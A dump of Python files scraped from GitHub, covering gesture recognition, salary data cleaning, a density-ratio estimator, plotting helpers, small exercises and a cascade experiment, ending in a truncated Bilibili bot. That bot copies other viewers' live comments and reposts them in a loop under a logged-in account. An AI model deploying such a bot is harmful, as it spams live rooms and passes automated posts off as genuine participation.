ring_fingertip_pixelCoordinatesLandmark[1], pinkytip_pixelCoordinatesLandmark[1]])\n \n up_join_pt = search_point(pts_list=[wrist_pixelCoordinatesLandmark, thumbtip_pixelCoordinatesLandmark, index_fingertip_pixelCoordinatesLandmark, mid_fingertip_pixelCoordinatesLandmark, ring_fingertip_pixelCoordinatesLandmark, pinkytip_pixelCoordinatesLandmark], cord=\"y\", target=upper_most)\n left_join_pt = search_point(pts_list=[wrist_pixelCoordinatesLandmark, thumbtip_pixelCoordinatesLandmark, index_fingertip_pixelCoordinatesLandmark, mid_fingertip_pixelCoordinatesLandmark, ring_fingertip_pixelCoordinatesLandmark, pinkytip_pixelCoordinatesLandmark], cord=\"x\", target=left_most)\n low_join_pt = search_point(pts_list=[wrist_pixelCoordinatesLandmark, thumbtip_pixelCoordinatesLandmark, index_fingertip_pixelCoordinatesLandmark, mid_fingertip_pixelCoordinatesLandmark, ring_fingertip_pixelCoordinatesLandmark, pinkytip_pixelCoordinatesLandmark], cord=\"y\", target=lower_most)\n right_join_pt = search_point(pts_list=[wrist_pixelCoordinatesLandmark, thumbtip_pixelCoordinatesLandmark, index_fingertip_pixelCoordinatesLandmark, mid_fingertip_pixelCoordinatesLandmark, ring_fingertip_pixelCoordinatesLandmark, pinkytip_pixelCoordinatesLandmark], cord=\"x\", target=right_most)\n\n up_join_dist = distance(a=up_join_pt, b=left_join_pt)\n low_join_dist = distance(a=right_join_pt, b=low_join_pt)\n\n top_left_corner = (int(up_join_pt[0]-up_join_dist-50), up_join_pt[1]-50)\n bottom_right_corner = (int(low_join_pt[0]+low_join_dist+30), low_join_pt[1]+50)\n\n # cv2.rectangle(frame, top_left_corner, bottom_right_corner, (255,0,0), thickness=2)\n\n if dist_OA <= 170 and dist_OB >= 230 and dist_OC >= 230 and dist_OD <= 170 and dist_OE <= 130:\n \n result = \"Scissor\"\n\n img = frame[top_left_corner[1]:bottom_right_corner[1], top_left_corner[0]:bottom_right_corner[0]]\n cv2.imwrite('images/user_result.jpg', img)\n\n # print(result)\n\n return result\n \n elif dist_OA <= 165 and dist_OB <= 148 and dist_OC <= 138 and dist_OD <= 132 and dist_OE <= 115:\n\n result = \"Rock\"\n\n img = frame[top_left_corner[1]:bottom_right_corner[1], top_left_corner[0]:bottom_right_corner[0]]\n cv2.imwrite('images/user_result.jpg', img)\n\n # print(result)\n\n return result\n\n elif dist_OA >= 110 and dist_OB >= 170 and dist_OC >= 170 and dist_OD >= 145 and dist_OE >= 100:\n\n result = \"Paper\"\n\n img = frame[top_left_corner[1]:bottom_right_corner[1], top_left_corner[0]:bottom_right_corner[0]]\n cv2.imwrite('images/user_result.jpg', img)\n\n # print(result)\n\n return result\n\n# data = [dist_OA,dist_OB,dist_OC,dist_OD,dist_OE]\n\n# with open('tracking-scissors.csv', 'a', encoding='UTF8') as f:\n# writer = csv.writer(f) \n# writer.writerow(data)\n \n# cv2.imshow('Rock, Paper, Scissors!', frame)\n\n \n# if cv2.waitKey(1) == 27:\n# break\n \n# cv2.destroyAllWindows()\n# capture.release()\n\n# landmark_recognition()","repo_name":"thieulong/Rock-Paper-Scissors","sub_path":"recognition.py","file_name":"recognition.py","file_ext":"py","file_size_in_byte":10569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"19233206282","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 20 14:06:07 2020\n\n@author: RussellP\n\"\"\"\nimport pandas as pd\n \ndf = pd.read_csv('glassdoor_jobs.csv')\n\n# Salary Parsing\n\n# Remove rating from Comapny Name Field\n\n# Parse state and city into 2 different columns (variables)\n\n# Change the founded variable to age of company\n\n# Parsing of Job Description (Python, Years Exp)\n\n\n# SALARY PARSING\n# Remove any values that do not have a valid salary (They are currently set -1)\ndf = df[df['Salary Estimate'] != '-1']\n\n# Removing 'Glassdor Est.' text from Salary Estimate fields\nsalary = df['Salary Estimate'].apply(lambda x: x.split('(')[0])\n\n# Removing the 'k' and '$' from the Salary Estimate range\nremoved_k = salary.apply(lambda x: x.replace('k', '').replace('$', ''))\n\n# Create Column for Per Hour and Employer Provided Salary in the case there is per hour or employer provided salaries\ndf['Hourly'] = df['Salary Estimate'].apply(lambda x: 1 if 'per hour' in x.lower() else 0) # use this type of method to parse out per hour also)\n\n# Get the min salary for the salary estimate range and convert to int\ndf['min_salary'] = removed_k.apply(lambda x: int(x.split('-')[0]))\n\n# Get the max salary for the salary estimate range and convert to int\ndf['max_salary'] = removed_k.apply(lambda x: int(x.split('-')[1]))\n\n# Get the average of the min and max salary\ndf['avg_salary'] = (df.min_salary + df.max_salary)/2\n\n# COMPANY NAME PARSING\n# Remove the rating\ndf['company_txt'] = df.apply(lambda x: x['Company Name'] if x['Rating'] < 0 else x['Company Name'][:-3], axis = 1)\n\n# LOCATION PARSING\n# Creating state field\ndf['job_state'] = df['Location'].apply(lambda x: x.split(',')[1])\n\n# Check if the job is in the same place as the HQ (NOTE: The scraper currently doesn't pull in the headquarters values, will fix soon)\ndf['same_state'] = df.apply(lambda x: 1 if x.Location == x.Headquarters else 0, axis = 1)\n\n\n# Check how many jobs are in each state (Note: our data is currently only from San Francisco)\n# df.job_state.value_counts()\n\n# FOUNDED PARSING\n# Changing it to age of company\ndf['age'] = df['Founded'].apply(lambda x: x if x < 1 else 2020 - x)\n\n# JOB DESCRIPTION PARSING\n# Python\ndf['python'] = df['Job Description'].apply(lambda x: 1 if 'python' in x.lower() else 0)\n\n# SQL\ndf['sql'] = df['Job Description'].apply(lambda x: 1 if 'sql' in x.lower() else 0)\n\n# Excel\ndf['excel'] = df['Job Description'].apply(lambda x: 1 if 'excel' in x.lower() else 0)\n\n# Apache Spark\ndf['spark'] = df['Job Description'].apply(lambda x: 1 if 'spark' in x.lower() else 0)\n\n# AWS\ndf['aws'] = df['Job Description'].apply(lambda x: 1 if 'aws' in x.lower() else 0)\n\n# 2 Years of experience (This parsing will be improved next iteration)\ndf['experience_2years'] = df['Job Description'].apply(lambda x: 1 if '2 years' in x.lower() else 0)\n\ndf.to_csv('salary_data_cleaned.csv', index = False)\n\npd.read_csv('salary_data_cleaned.csv')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"russell94paul/salary_estimator_project","sub_path":"data_cleaning.py","file_name":"data_cleaning.py","file_ext":"py","file_size_in_byte":2917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"9515301430","text":"from __future__ import annotations\r\n\r\nfrom typing import Optional\r\nimport numpy as np\r\nfrom sklearn.base import ClassifierMixin\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.pipeline import Pipeline\r\nfrom sklearn.utils.validation import check_is_fitted\r\nfrom mapie._typing import ArrayLike\r\n\r\n\r\nclass DensityRatioEstimator():\r\n \"\"\" Template class for density ratio estimation. \"\"\"\r\n\r\n def __init__(self) -> None:\r\n raise NotImplementedError\r\n\r\n def fit(self) -> None:\r\n raise NotImplementedError\r\n\r\n def predict(self) -> None:\r\n raise NotImplementedError\r\n\r\n def check_is_fitted(self) -> None:\r\n raise NotImplementedError\r\n\r\n\r\nclass ProbClassificationDRE(DensityRatioEstimator):\r\n \"\"\"\r\n Density ratio estimation by classification.\r\n\r\n This class implements the density ratio estimation by classification\r\n strategy. The broad idea is to first learn a discriminative classifier to\r\n distinguish between source and target datasets, and then use the class\r\n probability estimates from the classifier to estimate the density ratio.\r\n\r\n Parameters\r\n ----------\r\n estimator: Optional[ClassifierMixin]\r\n Any classifier with scikit-learn API (i.e. with fit, predict, and\r\n predict_proba methods), by default ``None``.\r\n If ``None``, estimator defaults to a ``LogisticRegression`` instance.\r\n\r\n clip_min: Optional[float]\r\n Lower bound the probability estimate from the classifier to\r\n ``clip_min``. If ``None``, the estimates are not lower bounded.\r\n\r\n By default ``None``.\r\n\r\n clip_max: Optional[float]\r\n Upper bound the probability estimate from the classifier to\r\n ``clip_max``. If ``None``, the estimates are not upper bounded.\r\n\r\n By default ``None``.\r\n\r\n Attributes\r\n ----------\r\n source_prob: float\r\n The marginal probability of getting a datapoint from the source\r\n distribution.\r\n\r\n target_prob: float\r\n The marginal probability of getting a datapoint from the target\r\n distribution.\r\n\r\n References\r\n ----------\r\n\r\n Examples\r\n --------\r\n\r\n \"\"\"\r\n\r\n def __init__(\r\n self,\r\n estimator: Optional[ClassifierMixin] = None,\r\n clip_min: Optional[float] = None,\r\n clip_max: Optional[float] = None,\r\n ) -> None:\r\n\r\n self.estimator = self._check_estimator(estimator)\r\n\r\n if clip_max is None:\r\n self.clip_max = 1\r\n elif all((clip_max >= 0, clip_max <= 1)):\r\n self.clip_max = clip_max\r\n else:\r\n raise ValueError(\"Expected `clip_max` to be between 0 and 1.\")\r\n\r\n if clip_min is None:\r\n self.clip_min = 0\r\n elif all((clip_min >= 0, clip_min <= clip_max)):\r\n self.clip_min = clip_min\r\n else:\r\n raise ValueError(\r\n \"Expected `clip_min` to be between 0 and `clip_max`.\")\r\n\r\n def _check_estimator(\r\n self,\r\n estimator: Optional[ClassifierMixin] = None,\r\n ) -> ClassifierMixin:\r\n \"\"\"\r\n Check if estimator is ``None``,\r\n and returns a ``LogisticRegression`` instance if necessary.\r\n\r\n Parameters\r\n ----------\r\n estimator : Optional[ClassifierMixin], optional\r\n Estimator to check, by default ``None``\r\n\r\n Returns\r\n -------\r\n ClassifierMixin\r\n The estimator itself or a default ``LogisticRegression`` instance.\r\n\r\n Raises\r\n ------\r\n ValueError\r\n If the estimator is not ``None``\r\n and has no fit, predict, nor predict_proba methods.\r\n \"\"\"\r\n if estimator is None:\r\n return LogisticRegression(class_weight=\"balanced\", random_state=0)\r\n\r\n if isinstance(estimator, Pipeline):\r\n est = estimator[-1]\r\n else:\r\n est = estimator\r\n if (\r\n not hasattr(est, \"fit\")\r\n and not hasattr(est, \"predict\")\r\n and not hasattr(est, \"predict_proba\")\r\n ):\r\n raise ValueError(\r\n \"Invalid estimator. \"\r\n \"Please provide a classifier with fit,\"\r\n \"predict, and predict_proba methods.\"\r\n )\r\n\r\n return estimator\r\n\r\n def fit(\r\n self,\r\n X_source: ArrayLike,\r\n X_target: ArrayLike,\r\n source_prob: Optional[float] = None,\r\n target_prob: Optional[float] = None,\r\n sample_weight: Optional[ArrayLike] = None\r\n ) -> ProbClassificationDRE:\r\n \"\"\"\r\n Fit the discriminative classifier to source and target samples.\r\n\r\n Parameters\r\n ----------\r\n X_source: ArrayLike of shape (n_source_samples, n_features)\r\n Training data.\r\n\r\n X_target: ArrayLike of shape (n_target_samples, n_features)\r\n Training data.\r\n\r\n source_prob: Optional[float]\r\n The marginal probability of getting a datapoint from the source\r\n distribution. If ``None``, the proportion of source examples in\r\n the training dataset is used.\r\n\r\n By default ``None``.\r\n\r\n target_prob: Optional[float]\r\n The marginal probability of getting a datapoint from the target\r\n distribution. If ``None``, the proportion of target examples in\r\n the training dataset is used.\r\n\r\n By default ``None``.\r\n\r\n sample_weight : Optional[ArrayLike] of shape (n_source + n_target,)\r\n Sample weights for fitting the out-of-fold models.\r\n If ``None``, then samples are equally weighted.\r\n If some weights are null,\r\n their corresponding observations are removed\r\n before the fitting process and hence have no prediction sets.\r\n\r\n By default ``None``.\r\n\r\n Returns\r\n -------\r\n ProbClassificationDRE\r\n The density ratio estimator itself.\r\n \"\"\"\r\n\r\n # Find the marginal source and target probability.\r\n n_source = X_source.shape[0]\r\n n_target = X_target.shape[0]\r\n\r\n if source_prob is None:\r\n source_prob = n_source/(n_source + n_target)\r\n\r\n if target_prob is None:\r\n target_prob = n_target/(n_source + n_target)\r\n\r\n if source_prob + target_prob != 1:\r\n raise ValueError(\r\n \"``source_prob`` and ``target_prob`` do not add up to 1.\")\r\n\r\n self.source_prob = source_prob\r\n self.target_prob = target_prob\r\n\r\n # Estimate the conditional probability of source/target given X.\r\n X = np.concatenate((X_source, X_target), axis=0)\r\n y = np.concatenate((np.zeros(n_source), np.ones(n_target)), axis=0)\r\n\r\n if type(self.estimator) == Pipeline:\r\n step_name = self.estimator.steps[-1][0]\r\n self.estimator.fit(\r\n X, y, **{f'{step_name}__sample_weight': sample_weight})\r\n else:\r\n self.estimator.fit(X, y, sample_weight=sample_weight)\r\n\r\n return self\r\n\r\n def predict(\r\n self,\r\n X: ArrayLike,\r\n ) -> ArrayLike:\r\n \"\"\"\r\n Predict the density ratio estimates for new samples.\r\n\r\n Parameters\r\n ----------\r\n X: ArrayLike of shape (n_samples, n_features)\r\n Samples to get the density ratio estimates for.\r\n\r\n Returns\r\n -------\r\n ProbClassificationDRE\r\n The density ratio estimtor itself.\r\n \"\"\"\r\n\r\n # Some models in sklearn have predict_proba but not predict_log_proba.\r\n if not hasattr(self.estimator, \"predict_log_proba\"):\r\n probs = self.estimator.predict_proba(X)\r\n log_probs = np.log(probs)\r\n else:\r\n log_probs = self.estimator.predict_log_proba(X)\r\n\r\n # Clip prob to mitigate extremely high or low dre.\r\n log_probs = np.clip(log_probs, a_min=np.log(\r\n self.clip_min), a_max=np.log(self.clip_max))\r\n\r\n return np.exp(log_probs[:, 1] - log_probs[:, 0] +\r\n np.log(self.source_prob) - np.log(self.target_prob))\r\n\r\n def check_is_fitted(self) -> None:\r\n if isinstance(self.estimator, Pipeline):\r\n check_is_fitted(self.estimator[-1])\r\n else:\r\n check_is_fitted(self.estimator)\r\n\r\n\r\ndef calculate_ess(weights: ArrayLike) -> float:\r\n \"\"\"\r\n Calculates the effective sample size given importance weights for the\r\n source distribution.\r\n\r\n Parameters\r\n ----------\r\n weights: ArrayLike\r\n Importance weights for the examples in source distribution.\r\n \"\"\"\r\n num = weights.sum()**2\r\n denom = (weights**2).sum()\r\n return num/denom","repo_name":"nilslacroix/MAPIE","sub_path":"mapie/dre.py","file_name":"dre.py","file_ext":"py","file_size_in_byte":8674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73691326985","text":"\"\"\"\nCreated on Tue Oct 24 15:51:47 2017\n\n@author: jsuter\n\nProject: Language Level Analysis and Classification\nSeminar \"Educational Assessment for Language Technology\" \nWS 2015/16, Magdalena Wolska\n\nJulia Suter, January 2019\n\n-----------------------------------------------------------------\n\ndata_visualization.py\n\n- save matplotlib figures\n- plot confusion matrix\n- plot feature coefficients\n- plot cluster components\n- plot PCA\n- set up feature set/n_cluster widgets\n\"\"\"\n\n\n# Import Statements\nimport os\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sklearn\n\nfrom ipywidgets import Select, IntSlider, Layout\nfrom IPython.display import display\n\n\n\ndef save_fig(fig_name, tight_layout=True, fig_extension=\"png\", resolution=300):\n\t\"\"\"Save current matplotlib plot as image with given file name.\n\t\n\tParameters:\n\n\t\tfig_name (string): figure name\n\t\n\tKeyword arguments:\n\n\t\ttight_layout (Boolean) -- set a tight layout for the figure (default = True)\n\t\tfig_extension (string) -- file format, e.g. \"jpeg\" will make the file end in .jpeg, default = \"png\"\n\t\tsolution (int) -- resolution of saved figure (default = 300)\n\n\tReturn: None\"\"\"\n\t\n\t# Set the file path \n\tpath = os.path.join(\"./figures/\", fig_name + \".\" + fig_extension)\n\n\t# Get tight layout if necessary\n\tif tight_layout:\n\t\tplt.tight_layout()\n\t\t\n\t# Save the figure in the right format and resolution\n\tplt.savefig(path, format=fig_extension, dpi=resolution)\n\n\ndef plot_confusion_matrix(solutions, predictions, label_set, title):\t\n\t\"\"\"Plot the confusion matrix for different classes given correct labels and predictions.\n\t\n\tParamters:\n\t\n\t\tsolutions (np.array) -- correct labels\n\t\tpredictions (np.array) -- predicted labels\n\t\tlabel_set (list) -- labels/classes to predict\n\t\ttitle (string) -- plot title displayed above plot\n\n\tReturn: None\"\"\"\n\t\n\t# Compute confusion matrix\n\tcm = sklearn.metrics.confusion_matrix(solutions, predictions, labels=range(len(label_set)))\n\t\n\t# Set figure size\n\tif len(label_set)>5:\n\t\tplt.figure(figsize=(10,10))\n\telse:\n\t\tplt.figure(figsize=(5,5))\n\n\t# Plot confusion matrix with blue color map\n\tplt.imshow(cm, interpolation='none',cmap='Blues')\n\n\t# Write out the number of instances per cell\n\tfor (i,j), z in np.ndenumerate(cm):\n\t\tplt.text(j, i, z, ha='center', va='center')\n\t\t\n\t# Assign labels and title\n\tplt.xlabel(\"Prediction\")\n\tplt.ylabel(\"Ground truth\")\n\tplt.title(title)\n\n\t# Set x ticks and labels\n\tplt.gca().set_xticks(range(len(label_set)))\n\tplt.gca().set_xticklabels(label_set, rotation=50)\n\n\t# Set y ticks and labels\n\tplt.gca().set_yticks(range(len(label_set)))\n\tplt.gca().set_yticklabels(label_set)\n\tplt.gca().invert_yaxis()\n\t\n\t# Show plot\n\tplt.show()\n\t\n\ndef plot_feature_coefficients(classifier, feature_names, label_set):\n\t\"\"\"Plot the feature coefficients for each label given an SVM classifier. \n\t\n\tParamters:\n\t\t\n\t\tclassifier (sklearn.svm._classes.LinearSVC) -- linear SVM classifier (has to be fitted!)\n\t\tfeature_names (list) -- feature names as list of strings\n\t\tlabel_set (list) -- label set as a list of strings\n\n\tReturn: None\n\t\"\"\"\n\t\n\t# Layout settings depending un number of labels\n\tif len(label_set)>4:\n\t\tFIGSIZE = (80,30)\n\t\tROTATION = 35\n\t\tRIGHT = 0.81\n\telse:\n\t\tFIGSIZE = (40,12)\n\t\tROTATION = 45\n\t\tRIGHT = 0.58\n\n\t# Sort the feature indices according coefficients (highest coefficient first)\n\tsort_idx = np.argsort(-abs(classifier.coef_).max(axis=0))\n\n\t# Get sorted coefficients and feature names\n\tsorted_coef = classifier.coef_[:,sort_idx]\n\tsorted_fnames = feature_names[sort_idx]\n\n\t# Make subplots\n\tx_fig, x_axis = plt.subplots(2,1,figsize=FIGSIZE)\n\n\t# Plot coefficients on two different lines\n\tim_0 = x_axis[0].imshow(sorted_coef[:,:sorted_coef.shape[1]//2], interpolation='none', cmap='seismic',vmin=-2.5, vmax=2.5)\n\tim_1 = x_axis[1].imshow(sorted_coef[:,sorted_coef.shape[1]//2:], interpolation='none', cmap='seismic',vmin=-2.5, vmax=2.5)\n\n\t# Set y ticks (number of classes)\n\tx_axis[0].set_yticks(range(len(label_set)))\n\tx_axis[1].set_yticks(range(len(label_set)))\n\n\t# Set the y labels (classes/labels)\n\tx_axis[0].set_yticklabels(label_set, fontsize=24)\n\tx_axis[1].set_yticklabels(label_set, fontsize=24)\n\n\t# Set x ticks (half the number of features) and labels\n\tx_axis[0].set_xticks(range(len(feature_names)//2))\n\tx_axis[1].set_xticks(range(len(feature_names)//2))\n\n\t# Set the x labels (feature names)\n\tx_axis[0].set_xticklabels(sorted_fnames[:len(feature_names)//2], rotation=ROTATION, ha='right', fontsize=20)\n\tx_axis[1].set_xticklabels(sorted_fnames[len(feature_names)//2:], rotation=ROTATION, ha='right', fontsize=20)\n\n\t# Move plot to the right\n\tx_fig.subplots_adjust(right=RIGHT)\n\n\t# Set color bar\n\tcbar_ax = x_fig.add_axes([0.605, 0.15, 0.02, 0.7])\n\tcbar = x_fig.colorbar(im_0, cax=cbar_ax)\n\tcbar.ax.tick_params(labelsize=24) \n\t\n\t# Show\n\tplt.show()\n\n\n\ndef plot_cluster_components(clusters, names):\n\t\"\"\"Visualize cluster components.\n\t\n\tParameters:\n\n\t\tclusters (np.array) -- array representing to which cluster each feature belongs\n\t\tnames (list) -- cluster components as list of strings\n\n\tReturn: None\n\t\"\"\"\n\n\t# Initialize figure\n\tfig = plt.figure(figsize=(20, 0.5))\n\n\t# Plot lines of appropriate length\n\tcluster_sizes = np.bincount(clusters)\n\t\n\t# Set color list\n\tcolors = [\"b\",\"g\",\"r\",\"c\",\"m\"]*100\t\n\tcolors = colors[:len(cluster_sizes)]\n\t\n\t# Transform names into list\n\tnames = names.tolist()\n\n\t# Plot a bar representing number of components for each cluster\n\tpos = 0.0\n\tfor clust_size, color in zip(cluster_sizes, colors):\n\t\tplt.plot([pos-0.9, pos+clust_size-1+0.1], [0, 0], lw=7, c=color)\n\t\tpos += clust_size+1\n\n\t\t# Add feature names\n\t\tnames.insert(int(pos-1),\"\")\n\n\t# Get axis\n\tax = fig.gca()\n\n\t# Remove all the frame stuff\n\tax.set_frame_on(False)\n\tax.xaxis.set_ticks_position('none') \n\tax.yaxis.set_visible(False)\n\t\n\t# Set the labels\n\tax.set_xticks(range(len(names)))\n\tax.xaxis.set_ticklabels(names, rotation=55, ha=\"right\", fontsize=11)\n\t\n\t# Set limitation of frame\n\tax.set_xlim((-0.9, pos+clust_size-1+0.1))\n\n\t# Show\n\tplt.show()\n\t\n\t\ndef plot_PCA(pca, transformed_data, features, solutions):\n\t\"\"\"Plot Principal Component Analysis.\n\t\n\tParameters:\n\n\t\tpca (sklearn._pca.PCA) -- PCA for features\n\t\ttransformed_data (np.array) -- PCA-transformed data\n\t\tfeatures (np.array) -- feature array\n\t\tsolutions (np.array) -- solution/label array \n\n\tReturn: None\"\"\"\n\n\t# Get first and second principal components\n\tfirst_pc = pca.components_[0]\n\tsecond_pc = pca.components_[1]\n\t\n\t# Axis of pc1, pc2\n\tfor i,j in zip(transformed_data, features):\n\t\tplt.scatter(first_pc[0]*i[0], first_pc[1]*i[0], color='r')\n\t\tplt.scatter(second_pc[0]*i[1], second_pc[1]*i[1], color='c')\n\t\tplt.scatter(j[0],j[1], color='b')\n\t\t\n\t# Plot\n\t#plt.show()\n\n\t# Prinicipal component space (pc1, pc2)\n\ttarget_colors = {0:'blue', 1:'green', 2:'orange', 3:'red'}\n\tplt.scatter(transformed_data[:,0],transformed_data[:,1], \n\t\t\t\tc=[target_colors[key] for key in solutions],\n\t\t\t\talpha=0.5, edgecolor='none')\n\n\t# Assign labels and title\n\tplt.xlabel(\"PC 1\")\n\tplt.ylabel(\"PC 2\")\n\tplt.title(\"PCA transformed data space\")\n\n\tplt.show()\n\n\n\t# Explained variance ratio (how much is covered by how many components)\n\n\t# Per component\n\tplt.plot(pca.explained_variance_ratio_)\n\t# Cumulative\n\tplt.plot(np.cumsum(pca.explained_variance_ratio_))\n\n\t# Assign labels and title\n\tplt.xlabel(\"Dimensions\")\n\tplt.ylabel(\"Explained variance\")\n\tplt.title(\"Explained Variance Ratio by Dimensions\")\n\n\tplt.show()\n\t\n\t\n# Widgets\n\n# Set box layout\nbox_layout = Layout(display='flex',\n\t\t\t\t\tflex_flow='column',\n\t\t\t\t\talign_items='stretch',\n\t\t\t\t\tborder='solid',\n\t\t\t\t\twidth='40%')\n\t\n# Set feature set widget\nfeature_set_widi = Select(\n\t\t options=['original features','original agglomerated features', 'baseline features',\n\t\t \"PCA components (explained variance of 95%)\", \n\t\t\t\t 'only non-sparse features', 'only relevant features', \n\t\t\t\t 'only sparse features', 'only less relevant features',\n\t\t\t\t 'only agglomerated sparse features','only agglomerated less relevant features',\n\t\t\t\t 'agglomerated sparse features + non-sprase features', \n\t\t\t\t 'agglomerated less relevant features + relevant features'],\n\t\t \n\t\tvalue='agglomerated less relevant features + relevant features', \n\t\tdescription='Feature set',\n\t\tlayout=box_layout)\n\n# Set cluster widget\nn_cluster_widi = IntSlider(\n\tvalue=5,\n\tmin=1,\n\tmax=80,\n\tstep=1,\n\tmax_width = 300,\n\tdescription='# clusters')\n","repo_name":"athrado/lang-level","sub_path":"2_Scripts/data_visualization.py","file_name":"data_visualization.py","file_ext":"py","file_size_in_byte":8330,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"70952300745","text":"def mul(a,b):\n\tc = a * b\n\tif c>100:\n\t\treturn c\n\t\t\na = mul(2,4)\t\t\t\t\n#if a==None:\n#if id(a)==id(None):\nif a is None:\n\tprint(\"No Return Value !\")\nelse:\t\n\tprint(a)\n\n\n\n","repo_name":"divyanshugour/Python-Basics","sub_path":"Programs-4/Pro9.py","file_name":"Pro9.py","file_ext":"py","file_size_in_byte":163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20061150530","text":"# Python sample Fizz Buzz\n\n# 入力メッセージ\nprint('Fizz Buzz を開始します')\nprint('上限値を入力してください')\n\n# 入力値受付\nwhile True:\n\n # 入力値\n var = input()\n\n if var.isdigit():\n # ループ終了\n print('')\n break\n else:\n # 再度入力\n print('数値を入力してください')\n\n# ループ\nfor i in range(int(var) + 1):\n # 出力用変数初期化\n result = ''\n\n # Fizz Buzz 判定\n if i % 3 == 0:\n result = result + 'Fizz'\n if i % 5 == 0:\n result = result + 'Buzz'\n\n if len(result) == 0:\n # FizzでもBuzzでもない場合、数値出力\n print(i)\n # ループ継続\n continue\n\n # 出力\n print(result)\n\nelse:\n # 終了メッセージ\n print('Fizz Buzz が終了しました')\n","repo_name":"atrow/python_sample","sub_path":"fizz_buzz.py","file_name":"fizz_buzz.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74787181064","text":"# coding: utf-8\n\nimport os\nimport pandas as pd\n\nfrom graph_tool import load_graph\nfrom glob import glob\nfrom tqdm import tqdm\nfrom joblib import Parallel, delayed\nfrom itertools import product\n\nfrom eval_helpers import eval_map\nfrom experiment import one_run\n\ninfection_proba = 0.1\n\nmethods = ['our', 'pagerank', 'min-steiner-tree']\n# methods = ['our']\nroot_sampler_names = ['true_root']\nobs_method = 'bfs-head'\n# root_sampler_names = [None]\n\ncascade_model = 'si'\n\n# a batch of settings to iterate through\nsettings = [\n # for grqc\n # {'graphs': ['grqc'],\n # 'obs_fractions': [\"0.5\"],\n # 'cascade_fractions': [\"0.05\", \"0.1\", \"0.15\", \"0.2\", \"0.25\"]},\n # {'graphs': ['grqc'],\n # 'obs_fractions': [\"0.5\", \"0.6\", \"0.7\", \"0.8\", \"0.9\"],\n # 'cascade_fractions': [\"0.05\"]},\n\n # # for lattice and infectious\n # {'graphs': ['infectious', 'lattice-1024'],\n # 'obs_fractions': [\"0.5\"],\n # 'cascade_fractions': [\"0.1\", \"0.2\", \"0.3\", \"0.4\", \"0.5\"]},\n {'graphs': ['infectious', 'lattice-1024', 'grqc'],\n 'obs_fractions': [\"0.1\", \"0.2\", \"0.3\", \"0.4\", \"0.5\", \"0.6\", \"0.7\", \"0.8\", \"0.9\"],\n 'cascade_fractions': [\"0.1\"]}\n]\n\nfor setting in settings:\n graphs, obs_fractions, cascade_fractions = setting['graphs'], \\\n setting['obs_fractions'], \\\n setting['cascade_fractions']\n for graph, obs_fraction, cascade_fraction, method, root_sampler_name \\\n in product(\n graphs, obs_fractions, cascade_fractions, methods, root_sampler_names\n ):\n g = load_graph('data/{}/graph_weighted_{}.gt'.format(graph, infection_proba))\n edge_weights = g.edge_properties['weights']\n\n dataset_id = \"{}-m{}-s{}-o{}-om{}\".format(graph, cascade_model, cascade_fraction, obs_fraction, obs_method)\n print('method', method)\n print('dataset_id', dataset_id)\n\n input_dir = 'cascade/{}/'.format(dataset_id)\n\n if root_sampler_name is not None and method == 'our':\n output_dir = 'output/{}-{}/{}/'.format(method, root_sampler_name, dataset_id)\n eval_result_path = 'eval/{}-{}/{}.pkl'.format(method, root_sampler_name, dataset_id)\n else:\n output_dir = 'output/{}/{}/'.format(method, dataset_id)\n eval_result_path = 'eval/{}/{}.pkl'.format(method, dataset_id)\n\n if not os.path.exists(os.path.dirname(eval_result_path)):\n os.makedirs(os.path.dirname(eval_result_path))\n\n rows = Parallel(n_jobs=-1)(delayed(one_run)(g, edge_weights, input_path, output_dir, method,\n root_sampler_name=root_sampler_name)\n for input_path in tqdm(glob(input_dir + '*.pkl')))\n assert len(rows) > 0, 'nothing calculated'\n\n scores = eval_map(input_dir, output_dir)\n\n summ = pd.Series(scores).describe()\n print(summ)\n summ.to_pickle(eval_result_path)\n","repo_name":"xiaohan2012/cascade-reconstruction-by-tree-samples","sub_path":"experiment_obs_method.py","file_name":"experiment_obs_method.py","file_ext":"py","file_size_in_byte":2996,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"43678930979","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2018/1/26 14:34\n# @Author : Leo\n# @Mail : leo@1201.us\n# @File : bilibili.py\n# @Software: PyCharm\n\n\nimport requests\nimport time\nimport random\n\n\nclass SendLiveRoll():\n\n def __init__(self, roomid):\n\n # 直播的房间号\n self.roomid = str(roomid)\n\n # 该网址用于获取数据\n self.url_1 = 'https://api.live.bilibili.com/ajax/msg'\n\n # 用于发弹幕的地址\n self.url_2 = 'https://api.live.bilibili.com/msg/send'\n\n # 模拟浏览器\n self.header = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'\n }\n\n # 账号信息\n self.cookie = {'Cookie': 'l=v; fts=150'}\n\n # 直播间信息\n self.form_1 = {\n 'csrf_token': '',\n 'roomid': self.roomid,\n 'token': ''\n }\n\n self.timestamp = str(int(time.time()))\n\n def DanMuSend(self):\n while True:\n # 请求弹幕信息, 服务器会返回弹幕\n html_1 = requests.post(\n self.url_1,\n data=self.form_1,\n headers=self.header)\n\n # 提取弹幕信息, 每个text_1里面有10条弹幕\n text_1 = list(map(lambda ii: html_1.json()[\n 'data']['room'][ii]['text'], range(10)))\n\n # 复制别人的弹幕, 一般复制最后几个, 目的是避免重复, 采用随机方式\n message = text_1[random.randint(7, 9)]\n print(message)\n\n # 需要提交的数据, 提交给服务器\n form_2 = {\n 'color': '16777215', # 颜色可以改变\n 'fontsize': '25',\n 'mode': '1',\n 'msg': message,\n 'rnd': self.timestamp, # 